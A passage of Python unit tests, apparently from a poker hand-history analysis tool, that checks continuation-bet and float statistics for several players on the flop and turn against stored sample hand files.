strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_cb_raise_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCRFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBRCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBRRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
def test_enum_cb_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('call', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('fold', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
def test_enum_cb_raise_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual('3bet', tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('fold', tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCRFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBRCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBRRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
class TestFloat(unittest.TestCase):
def test_float_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in0gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXBFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
